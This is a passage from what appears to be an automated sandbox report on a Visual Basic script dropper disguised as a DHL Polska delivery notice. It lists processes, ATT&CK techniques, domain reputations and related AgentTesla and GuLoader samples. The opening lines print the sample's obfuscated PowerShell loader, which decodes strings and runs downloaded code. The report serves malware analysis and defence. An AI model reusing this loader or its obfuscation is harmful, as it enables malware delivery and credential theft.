,$mels on v er ,e rg .l eet nc,sjr.mis ,pscl pifot v( s$meuern ch .oadmurotel.koh,g,biflcdi)co ');extensionalism (trosfllen ' p[b.nhaet,t .. .s .eferb,vfoi.tcnoet,povoliichnsltbimrea kn daokg.iesarc,] .:.i:disklespcseu irsliintuny.ip cr.eo ,t so fcf,o lte .l=bu se[ nbeefutal.besatesocfrumar oielt ay.op kr.nosutveosackiocol ut fy.ip.eega]ls: o:s.tpaldosmo1ps2 , ');$lovreglens=$malleolar[0];$fjedrene= (trosfllen ' o$.lgkul.eoetbd.asila.:esafond,i psdee.lindkmyo intrif.cgu= ,n pe.aw h-afojebtoj kefocp.t , desspy essntheebimul.,dn res.tre.luwspeprbspc ,le,ifoen nv t');$fjedrene+=$bigthatch[1];extensionalism ($fjedrene);extensionalism (trosfllen 'do$uha,rnfiidesbeeprifrkvrostnsai .cir.lehdue ,agidate,orimsbu[eu$stp srdeetuasysbosdiuprr di tnr gso]cr=s $sucstzrha,mrjod fa.esva ');$padle
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'cygnid hemiteratic orthodiagraphy217 malleolar lovreglens aflbsledninger sagsaktens traadrullerne nonscalar nondeclaratory yawnups abet226 stammefejderne33 avitaminosis aabenlyses fusionsmusikken earthworms kursusmodulet bolledejene rollefag eyras windowshopping usr disboscation91 cygnid hemiteratic orthodiagraphy217 malleolar lovreglens aflbsledninger sagsaktens traadrullerne nonscalar nondeclaratory yawnups abet226 stammefejderne33 avitaminosis aabenlyses fusionsmusikken earthworms kursusmodulet bolledejene rollefag eyras windowshopping usr disboscation91';if (${host}.currentculture) {$clairaudience++;}function trosfllen($gendigtende){$statshemmelighedernes=$gendigtende.length-$clairaudience;$prehensible='substri';$prehensible+='ng';for( $bilkberne195=2;$bilkberne195 -lt $statshemmelighedernes;$bilkberne195+=3){$cygnid+=$gendigtende.$prehensible.invoke( $bilkberne195, $clairaudience);}$cygnid;}function extensionalism($medullitis){ & ($impotens) ($medullitis);}$czardas=trosfllen ' omvrom,zbaiaalr.la,a.e/st5no.ko0ge br(bawini mnp,d,domew esre pnc tf, sp1ta0 ,. e0s.;pn ,w ,iskns 6en4 l;go trxsk6fo4 ;f, frguvh :ma1l 2,a1.n.pa0re)b, ge,e.ecankwioh / g2n.0an1st0.y0t,1.b0.s1m. cfvei rr ieenflyoprxso/co1ty2s,1 a. t0 d ';$preassuring=trosfllen ' auh skoeoprfa-nea,ugk,e ncot.k ';$lovreglens=trosfllen 'd hhjtoct .pacsos:tr/sa/hod srtei,fvskes .gigl,o.iohygaxltueb,. dcreo cmer/fiup.c i?beeanxa.pskoa,rvet i=bidp ocaw.in ols.o qaovdtr&loimad m=ko1 ey s-unsborarwmey t9p.w spatbox eode0seaa.cus2 fnjiv agan8 ja ,2,ea .u .meonbitri3bevsgqunyj cp ';$unhomologic=trosfllen ' >te ';$impotens=trosfllen 'peiunestxum ';$aarigt='traadrullerne';$databasemodellerne = trosfllen 'b etrck.h,nomy k%u.a ypt pkvdchahatbraul% s\ od,vesim,eo,rcl.r.iaretknieasolistndigno. is ppb.ico w,&bj&ki e.euncx h .ofo at h ';extensionalism (trosfllen ' s$,ngh,lviokubsoa lm : bgrit.gratcrhg.agetu.c ah.r=.h(zacflm kdj, pa/ eceu e.$andbratet ,asnb aa fskle amr oeld.eeorll,l,kea rmonfoehe)lu ');extensionalism (trosfllen 'ki$r gosl aoprbs atul.r:k.mt.a,tlsyluneauo tlskafars,= ,$mels on v er ,e rg .l eet nc,sjr.mis ,pscl pifot v( s$meuern ch .oadmurotel.koh,g,biflcdi)co ');extensionalism (trosfllen ' p[b.nhaet,t .. .s .eferb,vfoi.tcnoet,povoliichnsltbimrea kn daokg.iesarc,] .:.i:disklespcseu irsliintuny.ip cr.eo ,t so fcf,o lte .l=bu se[ nbeefutal.besatesocfrumar oielt ay.op kr.nosutveosackiocol ut fy.ip.eega]ls: o:s.tpaldosmo1ps2 , ');$lovreglens=$malleolar[0];$fjedrene= (trosfllen ' o$.lgkul.eoetbd.asila.:esafond,i psdee.lindkmyo intrif.cgu= ,n pe.aw h-afojebtoj kefocp.t , desspy essntheebimul.,dn res.tre.luwspeprbspc ,le,ifoen nv t');$fjedrene+=$bigthatch[1];extensionalism ($fjedrene);extensionalism (trosfllen 'do$uha,rnfiidesbeeprifrkvrostnsai .cir.lehdue ,agidate,orimsbu[eu$stp srdeetuasysbosdiuprr di tnr gso]cr=s $sucstzrha,mrjod fa.esva ');$padleJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information121
            Scripting            		Valid Accounts1
            Windows Management Instrumentation            		121
            Scripting            		11
            Process Injection            		1
            Masquerading            		OS Credential Dumping1
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts21
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		21
            Virtualization/Sandbox Evasion            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Exploitation for Client Execution            		Logon Script (Windows)Logon Script (Windows)11
            Process Injection            		Security Account Manager21
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login HookLogin Hook1
            Deobfuscate/Decode Files or Information            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information            		LSA Secrets13
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Software Packing            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs3%ReversingLabsWin32.Dropper.Generic
            DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs5%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            drive.usercontent.google.com1%VirustotalBrowse
            drive.google.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://aka.ms/pscore6lB0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            https://apis.google.com0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://drive.google.com/u0%Avira URL Cloudsafe
            http://drive.usercontent.google.com0%Avira URL Cloudsafe
            https://drive.google.com/uc?ex0%Avira URL Cloudsafe
            https://go.microsoft.co0%Avira URL Cloudsafe
            https://drive.goog0%Avira URL Cloudsafe
            https://drive.goog1%VirustotalBrowse
            https://drive.usercontent.googh80%Avira URL Cloudsafe
            http://drive.google.com0%Avira URL Cloudsafe
            https://go.microsoft.co1%VirustotalBrowse
            https://drive.google.com/uc?ex2%VirustotalBrowse
            https://drive.google.com/u0%VirustotalBrowse
            https://drive.google.0%Avira URL Cloudsafe
            https://drive.go0%Avira URL Cloudsafe
            http://drive.usercontent.google.com1%VirustotalBrowse
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            https://drive.goo0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            https://drive.g0%Avira URL Cloudsafe
            https://drive.google.com/uc0%Avira URL Cloudsafe
            https://drive.google.0%VirustotalBrowse
            https://drive.goo0%VirustotalBrowse
            https://github.com/Pester/Pester1%VirustotalBrowse
            https://drive.google.com/0%Avira URL Cloudsafe
            http://drive.google.com0%VirustotalBrowse
            https://www.google.com0%VirustotalBrowse
            https://drive.google.com/uc?e0%Avira URL Cloudsafe
            https://drive.google.com0%Avira URL Cloudsafe
            https://drive.googl0%Avira URL Cloudsafe
            https://drive.google.com/uc1%VirustotalBrowse
            https://drive.usercontent.google.com0%Avira URL Cloudsafe
            https://drive.googPB0%Avira URL Cloudsafe
            https://drive.google.com/uc?e2%VirustotalBrowse
            https://drive.google.c0%Avira URL Cloudsafe
            https://drive.google.com/uc?0%Avira URL Cloudsafe
            https://drive.usercontent.google.com1%VirustotalBrowse
            https://drive.google0%Avira URL Cloudsafe
            https://drive.google.co0%Avira URL Cloudsafe
            http://crl.micros0%Avira URL Cloudsafe
            https://drive.google.com/1%VirustotalBrowse
            https://drive.google.com/uc?0%VirustotalBrowse
            https://drive.google.com1%VirustotalBrowse
            https://drive.google0%VirustotalBrowse
            https://drive.google.co0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		142.250.185.174
            		truefalseunknown
            drive.usercontent.google.com
            		142.250.186.161
            		truefalseunknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.3010170859.000001D066B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://drive.usercontent.google.compowershell.exe, 00000005.00000002.2970229076.000001D0588FC000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.googpowershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2969690427.0000000004F26000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://go.microsoft.copowershell.exe, 00000005.00000002.3017587099.000001D06EF80000.00000004.00000020.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2969690427.0000000004F26000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://drive.google.com/uc?expowershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.google.com/upowershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://go.micropowershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/Licensepowershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/Iconpowershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://drive.google.compowershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.usercontent.googh8powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://drive.google.powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.gopowershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2969690427.0000000004F26000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.goopowershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://www.google.compowershell.exe, 00000005.00000002.2970229076.000001D056FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.gpowershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://drive.google.com/ucpowershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://aka.ms/pscore6lBpowershell.exe, 00000009.00000002.2969690427.0000000004DD1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://drive.google.com/powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.googlpowershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://drive.google.com/uc?epowershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://contoso.com/powershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.3010170859.000001D066B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://drive.google.compowershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D05856A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D056D05000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.usercontent.google.compowershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D056FA8000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.googPBpowershell.exe, 00000005.00000002.2970229076.000001D0588BE000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://drive.google.cpowershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://aka.ms/pscore68powershell.exe, 00000005.00000002.2970229076.000001D056AE1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://apis.google.compowershell.exe, 00000005.00000002.2970229076.000001D056FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://drive.google.com/uc?powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.2970229076.000001D056AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2969690427.0000000004DD1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://drive.googlepowershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.google.copowershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://crl.microspowershell.exe, 00000005.00000002.3019849567.000001D06F29C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            142.250.185.174
            		drive.google.comUnited States
            		15169GOOGLEUSfalse
            142.250.186.161
            		drive.usercontent.google.comUnited States
            		15169GOOGLEUSfalse

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1466655
            Start date and time:2024-07-03 08:49:24 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 5m 54s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:11
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs
            renamed because original name is a hash value
            Original Sample Name:DHL Polska_Powiadomienie oprzesyce 28036893335.vbs
            Detection:MAL
            Classification:mal96.troj.expl.evad.winVBS@9/7@2/2
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 45
            • Number of non-executed functions: 13
            Cookbook Comments:
            • Found application associated with file extension: .vbs

            Warnings

            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
            • Excluded IPs from analysis (whitelisted): 93.184.221.240
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target powershell.exe, PID 6160 because it is empty
            • Execution Graph export aborted for target powershell.exe, PID 8096 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            02:50:17API Interceptor1x Sleep call for process: wscript.exe modified
            02:52:14API Interceptor55x Sleep call for process: powershell.exe modified

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASNs

            No context

            JA3 Fingerprints

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            3b5074b1b5d032e5620f69f9f700ff0eZapytanie ofertowe (GASTRON 07022024).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
            • 142.250.185.174
            • 142.250.186.161
            B24E33 ENQUIRY.vbeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 142.250.185.174
            • 142.250.186.161
            Purchase Order N#U00b0 20240702.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
            • 142.250.185.174
            • 142.250.186.161
            AWB 3609 961.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
            • 142.250.185.174
            • 142.250.186.161
            MT_0615_60931PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 142.250.185.174
            • 142.250.186.161
